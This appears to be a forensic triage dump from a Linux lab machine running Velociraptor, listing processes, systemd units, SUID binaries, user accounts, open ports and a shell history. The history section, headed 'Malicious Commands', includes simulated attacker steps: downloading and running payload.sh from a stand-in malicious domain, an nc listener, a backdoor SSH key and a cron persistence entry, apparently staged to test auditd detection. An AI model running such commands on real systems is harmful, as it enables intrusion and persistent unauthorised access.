champus+ 10741 0.0 1.0 2428568 65204 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab
champus+ 10748 0.0 1.0 2428568 65296 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab
champus+ 10754 0.0 1.0 2428568 65088 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab
root 10934 0.0 0.0 0 0 ? I 11:50 0:03 [kworker/1:1-mm_percpu_wq]
root 23306 0.0 0.0 0 0 ? I 16:23 0:00 [kworker/u4:2]
root 24156 0.0 0.0 0 0 ? I 16:53 0:01 [kworker/0:1-events]
root 24945 0.0 0.0 0 0 ? I 18:38 0:00 [kworker/u5:1-events_unbound]
root 24992 0.0 0.0 0 0 ? I 18:45 0:00 [kworker/u6:3-events_unbound]
root 25203 0.0 0.0 0 0 ? I 19:21 0:00 [kworker/u5:3-events_power_efficient]
root 25287 0.0 0.0 0 0 ? I 19:35 0:00 [kworker/u6:1-flush-8:0]
root 25465 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/0:2-events]
root 25479 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u6:2-flush-8:0]
root 25485 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u5:0-flush-8:0]
root 25508 0.0 0.0 0 0 ? I 19:46 0:00 [kworker/1:2-cgroup_destroy]
champus+ 25558 0.4 1.0 3057456 64080 ? Sl 19:48 0:01 gjs /usr/share/gnome-shell/extensions/ding@rastersoft.com/ding.js -E -P /usr/share/gnome-shell/extensions/ding@rastersoft.com -M 0 -D 0:0:1280:800:1:27:0:0:0:0
champus+ 25620 0.0 0.3 35940 19456 ? S 19:49 0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait
champus+ 25621 0.0 0.4 307540 27904 ? Sl 19:49 0:00 /usr/bin/gnome-terminal.real --wait
champus+ 25624 1.1 0.7 889108 48488 ? Ssl 19:49 0:03 /usr/libexec/gnome-terminal-server
champus+ 25647 0.0 0.0 11268 5504 pts/0 Ss 19:49 0:00 bash
root 25669 0.0 0.0 0 0 ? I 19:49 0:00 [kworker/0:0-events]
root 25715 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u5:2-events_power_efficient]
root 25716 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u6:0-writeback]
root 25736 0.0 0.1 14348 6272 pts/0 S+ 19:51 0:00 sudo -i
root 25737 0.0 0.0 14348 2512 pts/1 Ss 19:51 0:00 sudo -i
root 25738 0.0 0.0 11396 5504 pts/1 S 19:51 0:00 -bash
root 25780 0.0 0.0 11396 3804 pts/1 S+ 19:53 0:00 -bash
root 25786 0.0 0.0 12672 3456 pts/1 R+ 19:53 0:00 ps aux
--------------------------------- List files (two directory listings follow; the directory paths are not recorded in this output):
total 68
drwxrwxrwt 17 root root 4096 Nov 6 19:48 .
drwxr-xr-x 20 root root 4096 Aug 27 17:11 ..
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .font-unix
-rw------- 1 champuser champuser 0 Nov 6 11:09 gdm3-config-err-4Hw2lH
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .ICE-unix
drwx------ 4 root root 4096 Nov 6 11:42 snap-private-tmp
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .Test-unix
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .X11-unix
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .XIM-unix
total 12
drwxr-xr-x 3 root root 4096 Nov 1 13:49 .
drwxr-xr-x 20 root root 4096 Aug 27 17:11 ..
drwx------ 16 root root 4096 Oct 4 16:23 velociraptor
--------------------------------- List Update.custom
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged QEMU_HARDDISK 1
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged QEMU_HARDDISK EFI\x20System\x20Partition
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged QEMU_HARDDISK 3
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device loaded active plugged QEMU_HARDDISK
sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device loaded active plugged Virtio network device
sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0
sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1
sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10
sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11
sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12
sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13
sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14
sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15
sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16
sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17
sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18
sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19
sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2
sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20
sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21
sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22
sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23
sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24
sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25
sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26
sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27
sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28
sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29
sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3
sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30
sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31
sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4
sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5
sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6
sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7
sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8
sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9
sys-devices-virtual-block-loop0.device loaded active plugged /sys/devices/virtual/block/loop0
sys-devices-virtual-block-loop1.device loaded active plugged /sys/devices/virtual/block/loop1
sys-devices-virtual-block-loop10.device loaded active plugged /sys/devices/virtual/block/loop10
sys-devices-virtual-block-loop11.device loaded active plugged /sys/devices/virtual/block/loop11
sys-devices-virtual-block-loop12.device loaded active plugged /sys/devices/virtual/block/loop12
sys-devices-virtual-block-loop13.device loaded active plugged /sys/devices/virtual/block/loop13
sys-devices-virtual-block-loop2.device loaded active plugged /sys/devices/virtual/block/loop2
sys-devices-virtual-block-loop3.device loaded active plugged /sys/devices/virtual/block/loop3
sys-devices-virtual-block-loop4.device loaded active plugged /sys/devices/virtual/block/loop4
sys-devices-virtual-block-loop5.device loaded active plugged /sys/devices/virtual/block/loop5
sys-devices-virtual-block-loop6.device loaded active plugged /sys/devices/virtual/block/loop6
sys-devices-virtual-block-loop7.device loaded active plugged /sys/devices/virtual/block/loop7
sys-devices-virtual-block-loop8.device loaded active plugged /sys/devices/virtual/block/loop8
sys-devices-virtual-block-loop9.device loaded active plugged /sys/devices/virtual/block/loop9
sys-devices-virtual-misc-rfkill.device loaded active plugged /sys/devices/virtual/misc/rfkill
sys-devices-virtual-tty-ttyprintk.device loaded active plugged /sys/devices/virtual/tty/ttyprintk
sys-module-configfs.device loaded active plugged /sys/module/configfs
sys-module-fuse.device loaded active plugged /sys/module/fuse
sys-subsystem-net-devices-ens18.device loaded active plugged Virtio network device
-.mount loaded active mounted Root Mount
boot-efi.mount loaded active mounted /boot/efi
dev-hugepages.mount loaded active mounted Huge Pages File System
dev-mqueue.mount loaded active mounted POSIX Message Queue File System
proc-sys-fs-binfmt_misc.mount loaded active mounted Arbitrary Executable File Formats File System
run-credentials-systemd\x2dsysusers.service.mount loaded active mounted /run/credentials/systemd-sysusers.service
run-snapd-ns-firefox.mnt.mount loaded active mounted /run/snapd/ns/firefox.mnt
run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount loaded active mounted /run/snapd/ns/snapd-desktop-integration.mnt
run-snapd-ns.mount loaded active mounted /run/snapd/ns
run-user-1000-doc.mount loaded active mounted /run/user/1000/doc
run-user-1000-gvfs.mount loaded active mounted /run/user/1000/gvfs
run-user-1000.mount loaded active mounted /run/user/1000
snap-bare-5.mount loaded active mounted Mount unit for bare, revision 5
snap-core22-2133.mount loaded active mounted Mount unit for core22, revision 2133
snap-core22-2139.mount loaded active mounted Mount unit for core22, revision 2139
snap-firefox-7084.mount loaded active mounted Mount unit for firefox, revision 7084
snap-firefox-7177.mount loaded active mounted Mount unit for firefox, revision 7177
snap-gnome\x2d42\x2d2204-202.mount loaded active mounted Mount unit for gnome-42-2204, revision 202
snap-gnome\x2d42\x2d2204-226.mount loaded active mounted Mount unit for gnome-42-2204, revision 226
snap-gtk\x2dcommon\x2dthemes-1535.mount loaded active mounted Mount unit for gtk-common-themes, revision 1535
snap-snap\x2dstore-1113.mount loaded active mounted Mount unit for snap-store, revision 1113
snap-snap\x2dstore-1216.mount loaded active mounted Mount unit for snap-store, revision 1216
snap-snapd-25202.mount loaded active mounted Mount unit for snapd, revision 25202
snap-snapd-25577.mount loaded active mounted Mount unit for snapd, revision 25577
snap-snapd\x2ddesktop\x2dintegration-178.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 178
snap-snapd\x2ddesktop\x2dintegration-315.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 315
sys-fs-fuse-connections.mount loaded active mounted FUSE Control File System
sys-kernel-config.mount loaded active mounted Kernel Configuration File System
sys-kernel-debug-tracing.mount loaded active mounted /sys/kernel/debug/tracing
sys-kernel-debug.mount loaded active mounted Kernel Debug File System
sys-kernel-tracing.mount loaded active mounted Kernel Trace File System
acpid.path loaded active running ACPI Events Check
cups.path loaded active running CUPS Scheduler
systemd-ask-password-plymouth.path loaded active waiting Forward Password Requests to Plymouth Directory Watch
systemd-ask-password-wall.path loaded active waiting Forward Password Requests to Wall Directory Watch
whoopsie.path loaded active waiting Start whoopsie on modification of the /var/crash directory
init.scope loaded active running System and Service Manager
session-2.scope loaded active running Session 2 of User champuser
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
auditd.service loaded active running Security Auditing Service
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
gdm.service loaded active running GNOME Display Manager
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create List of Static Device Nodes
ModemManager.service loaded active running Modem Manager
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
packagekit.service loaded active running PackageKit Daemon
plymouth-quit-wait.service loaded active exited Hold until boot process finishes up
plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data
plymouth-start.service loaded active exited Show Plymouth Boot Screen
podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always
polkit.service loaded active running Authorization Manager
power-profiles-daemon.service loaded active running Power Profiles daemon
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
setvtrgb.service loaded active exited Set console scheme
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-binfmt.service loaded active exited Set Up Additional Binary Formats
systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-trigger.service loaded active exited Coldplug All udev Devices
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP
systemd-user-sessions.service loaded active exited Permit User Sessions
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user@1000.service loaded active running User Manager for UID 1000
velociraptor.service loaded active running Velociraprot linux amd64
wpa_supplicant.service loaded active running WPA supplicant
-.slice loaded active active Root Slice
system-getty.slice loaded active active Slice /system/getty
system-modprobe.slice loaded active active Slice /system/modprobe
system-systemd\x2dfsck.slice loaded active active Slice /system/systemd-fsck
system.slice loaded active active System Slice
user-1000.slice loaded active active User Slice of UID 1000
user.slice loaded active active User and Session Slice
acpid.socket loaded active running ACPID Listen Socket
avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket
cups.socket loaded active running CUPS Scheduler
dbus.socket loaded active running D-Bus System Message Bus Socket
podman.socket loaded active listening Podman API Socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-fsckd.socket loaded active listening fsck to fsckd communication Socket
systemd-initctl.socket loaded active listening initctl Compatibility Named Pipe
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-rfkill.socket loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
uuidd.socket loaded active listening UUID daemon activation socket
swapfile.swap loaded active active /swapfile
basic.target loaded active active Basic System
cryptsetup.target loaded active active Local Encrypted Volumes
getty-pre.target loaded active active Preparation for Logins
getty.target loaded active active Login Prompts
graphical.target loaded active active Graphical Interface
local-fs-pre.target loaded active active Preparation for Local File Systems
local-fs.target loaded active active Local File Systems
multi-user.target loaded active active Multi-User System
network-online.target loaded active active Network is Online
network-pre.target loaded active active Preparation for Network
network.target loaded active active Network
nss-lookup.target loaded active active Host and Network Name Lookups
nss-user-lookup.target loaded active active User and Group Name Lookups
paths.target loaded active active Path Units
remote-fs.target loaded active active Remote File Systems
slices.target loaded active active Slice Units
snapd.mounts-pre.target loaded active active Mounting snaps
snapd.mounts.target loaded active active Mounted snaps
sockets.target loaded active active Socket Units
swap.target loaded active active Swaps
sysinit.target loaded active active System Initialization
time-set.target loaded active active System Time Set
timers.target loaded active active Timer Units
veritysetup.target loaded active active Local Verity Protected Volumes
anacron.timer loaded active waiting Trigger anacron every hour
apt-daily-upgrade.timer loaded active waiting Daily apt upgrade and clean activities
apt-daily.timer loaded active waiting Daily apt download activities
dpkg-db-backup.timer loaded active waiting Daily dpkg database backup timer
e2scrub_all.timer loaded active waiting Periodic ext4 Online Metadata Check for All Filesystems
fstrim.timer loaded active waiting Discard unused blocks once a week
fwupd-refresh.timer loaded active waiting Refresh fwupd metadata regularly
logrotate.timer loaded active waiting Daily rotation of log files
man-db.timer loaded active waiting Daily man-db regeneration
motd-news.timer loaded active waiting Message of the Day
podman-auto-update.timer loaded active waiting Podman auto-update timer
systemd-tmpfiles-clean.timer loaded active waiting Daily Cleanup of Temporary Directories
update-notifier-download.timer loaded active waiting Download data for packages that failed at package install time
update-notifier-motd.timer loaded active waiting Check to see whether there is a new version of Ubuntu available
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
220 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- CronJob
--------------------------------- suid
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/gpasswd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chfn
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/mount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/newgrp
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chsh
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/passwd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/umount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/su
/snap/core22/2133/usr/bin/chfn
/snap/core22/2133/usr/bin/chsh
/snap/core22/2133/usr/bin/gpasswd
/snap/core22/2133/usr/bin/mount
/snap/core22/2133/usr/bin/newgrp
/snap/core22/2133/usr/bin/passwd
/snap/core22/2133/usr/bin/su
/snap/core22/2133/usr/bin/sudo
/snap/core22/2133/usr/bin/umount
/snap/core22/2133/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2133/usr/lib/openssh/ssh-keysign
/snap/core22/2133/usr/libexec/polkit-agent-helper-1
/snap/core22/2139/usr/bin/chfn
/snap/core22/2139/usr/bin/chsh
/snap/core22/2139/usr/bin/gpasswd
/snap/core22/2139/usr/bin/mount
/snap/core22/2139/usr/bin/newgrp
/snap/core22/2139/usr/bin/passwd
/snap/core22/2139/usr/bin/su
/snap/core22/2139/usr/bin/sudo
/snap/core22/2139/usr/bin/umount
/snap/core22/2139/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2139/usr/lib/openssh/ssh-keysign
/snap/core22/2139/usr/libexec/polkit-agent-helper-1
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/umount
/usr/bin/sudo
/usr/bin/su
/usr/libexec/polkit-agent-helper-1
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/xorg/Xorg.wrap
--------------------------------- Malicious Commands
chmod +x /usr/local/bin/velociraptor
velociraptor config generate -i
nano /root/server.config.yaml
nano /lib/systemd/system/velociraptor.service
systemctl daemon-reload
systemctl enable --now velociraptor
systemctl status velociraptor
systemctl restart velociraptor.service
nano /root/server.config.yaml
systemctl restart velociraptor.service
cls
clear
the key should be located in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated however. The "Installer" section is non existent meaning the key doesnt exist
for whatever reason I was only able to locate 17 registry keys using the hunt function. Lets move to windows now
ls
pwd
cat server.config.yaml
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
cd .ssh
cd /.ssh
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
apt install net-tools
cls
cleart
clear
install auditd
apt install auditd
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/auditrules -O /etc/audit/rules.d/audit.rules
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/audit.rules -O /etc/audit/rules.d/audit.rules
clear
systemctl restart audit.d
cleart
clear
systemctl restart auditd
systemctl status auditd
clear
tail /var/log/audit/auditlog
clear
tail /var/log/audit/audit.log
clear
wget https://research.cyfidant.com
clear
cat /var/log/audit/audit.log | grep wget
clear
grep wget /var/log/audit/audit.loc
grep wget /var/log/audit/audit.log
grep https://research.cyfidant.com /var/log/audit/audit.log
|
List User Accounts
_apt
avahi
avahi-autoipd
backup
bin
champuser
colord
cups-pk-helper
daemon
dnsmasq
fwupd-refresh
games
gdm
geoclue
gnats
gnome-initial-setup
hplip
irc
kernoops
list
lp
mail
man
messagebus
news
nm-openvpn
nobody
proxy
pulse
root
rtkit
saned
speech-dispatcher
sssd
sudoadmin
sync
sys
syslog
systemd-network
systemd-oom
systemd-resolve
systemd-timesync
tcpdump
tss
usbmux
uucp
uuidd
whoopsie
www-data
-------------------------------- Networks opening
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 10.0.17.48:8001 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 10.0.17.48:8003 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 10.0.17.48:8889 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 381/systemd-resolve
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 645/cupsd
tcp6 0 0 ::1:631 :::* LISTEN 645/cupsd
tcp6 0 0 :::8000 :::* LISTEN 721/velociraptor
udp 0 0 127.0.0.53:53 0.0.0.0:* 381/systemd-resolve
udp 0 0 0.0.0.0:5353 0.0.0.0:* 491/avahi-daemon: r
udp 0 0 0.0.0.0:51761 0.0.0.0:* 491/avahi-daemon: r
udp6 0 0 :::44447 :::* 491/avahi-daemon: r
udp6 0 0 :::5353 :::* 491/avahi-daemon: r
raw6 0 0 :::58 :::* 7 496/NetworkManager
--------------------------------- Local Groups Information
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
